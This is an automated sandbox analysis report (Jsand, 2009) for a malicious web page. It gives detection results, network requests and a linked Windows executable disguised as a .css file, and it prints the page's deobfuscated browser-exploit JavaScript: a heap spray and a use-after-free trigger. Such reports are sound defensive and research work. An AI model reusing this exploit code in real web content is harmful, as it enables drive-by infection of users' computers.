Analysis report for http://cccbbbb.cn/1/02.htm
Sample Overview
| URL | http://cccbbbb.cn/1/02.htm |
|---|---|
| MD5 | 1187197e666ccce5d4cc20c0bc271646 |
| Analysis Started | 2009-02-23 07:56:24 |
| Report Generated | 2009-02-23 07:56:31 |
| Jsand version | 1.03.02 |
Detection results
| Detector | Result |
|---|---|
| Jsand 1.03.02 | suspicious |
Exploits
No exploits were identified.
Deobfuscation results
Evals
var b = unescape("%" + "u" + "0" + "C" + "0" + "C" + "%" + "u" + "0" + "C" + "0" + "C");
var test99 = yumen;
var yumen = new Array();
Tameeeeee = unescape(ttt.replace(/Game/g, "\x25\x75"));
while (b.length < 0x100000 - (ttt.length * 2 + 0x01020) / 2){b+=b}
var lh=b.substring(0,0x100000-(ttt.length*2+0x01020)/2);
for (i = 0; i < 0xC0; i ++ ){
yumen[i] = lh + Tameeeeee
}
CollectGarbage();
var s1 = unescape("%" + "u" + "0" + "b" + "0" + "b" + "%" + "u" + "0" + "b" + "0" + "b" +
"kfkfkfkfkfkfkfkfkfkfkfkfk");
var a1 = new Array();
for (var x = 0; x < 1000; x ++ )a1.push(document.createElement("img"));
function ok(){
o1 = document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1 = null;
CollectGarbage();
for (var x = 0; x < a1.length; x ++ )a1[x].src = s1;
o2.click
}
(repeated 1 time)
Writes
No writes.
Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://cccbbbb.cn/1/02.htm | 200 | text/html |
| http://cccbbbb.cn/1/set.js | 200 | application/x-javascript |
Redirects
No redirects.
ActiveX controls
No objects/controls.
Shellcode and Malware
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://ddddsss12.cn/00.css | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | 1ae9f20fa25cd48ca439bff451ea3e4d | |